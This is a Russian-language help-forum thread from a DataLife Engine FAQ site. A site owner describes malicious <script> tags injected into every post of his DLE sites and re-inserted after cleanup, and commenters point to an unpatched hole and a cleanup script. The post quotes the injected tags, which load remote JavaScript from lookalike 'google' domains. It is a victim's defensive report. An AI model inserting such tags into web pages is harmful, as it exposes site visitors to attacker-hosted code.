Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы » Взлом сайта, скрипт в бд?

Взлом сайта, скрипт в бд?


     28.09.2013    Общие вопросы, Хаки, MySQL    4514

вопрос
Всем привет, есть парочка сайтов на DLE 10.0, все в одном акаунте на хостинге, в каждом из сайтов прописался код в каждый пост, даже в статические страницы, вот такого вида -

<script async="async" type="text/javascript" src="http://google-statis...a73e1482372b.js"></script>


и

<script async="async" type="text/javascript" src="http://google-webmas...a73e1482372b.js"></script>


вот эта часть 17d63b1625c816c22647a73e1482372b.js в одном посте одна, в другом другая и т.д.!

Как именно происходит взлом сайта, может кто стыкался с подобной проблемой?

Есть ли команад с помощью которой всю эту хрень можно удалить с постов в базе данных? Вручную чистить сайт на котором около 1000 постов, дохрена времени нужно!

Пробывал вручную почистить с бд на котором было только 10 записей в таблице dle_post, с одного сайта удалил, но стоит зайти на сайт самому сразу после удаления кода, как он тут же появляется снова в бд, я так понимаю, что и какие-то файлы движка учавствуют в вставке кода в базу, значит в них так же прописана команда для импорта кода в таблицы базы! Думаю не одному мне интересно, что и как сделать, чтобы в дальнейшем избежать такого взлома!

Всем заранее спасибо за ответ и за помощь в решении проблемы!

5 комментариев

SEOWEB
Юзер

SEOWEB - 29 сентября 2013 15:34 -

Прикол в том, что дыра залатана и подобных файлов нет ни на одном сайте, тоесть чистый двиг с залатаной дырой, как попадают в бд скрипты хз!

dj-avtosh
PHP-developer

dj-avtosh - 29 сентября 2013 15:47 -

Они точно в БД?

По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

araksys64
Юзер

araksys64 - 3 октября 2013 21:19 -

Меня настигла такая же беда на двух сайтах(dle 9.4 и 10) :( базу почистил скриптом отсюда _http://habrahabr.kz/DLE_754_doktor-dle-udalenie-virusov-iz-bazy-dannyh.html Пока что заново вроде не появляются в базе, но хотелось бы тоже узнать откуда эта зараза...

dj-avtosh
PHP-developer

dj-avtosh - 3 октября 2013 21:20 -

дырка)

По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

araksys64
Юзер

araksys64 - 3 октября 2013 22:11 -

ну я уж догадался что дырка) хотелось бы узнать где она, чтобы такого не повторилось...

Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

наверх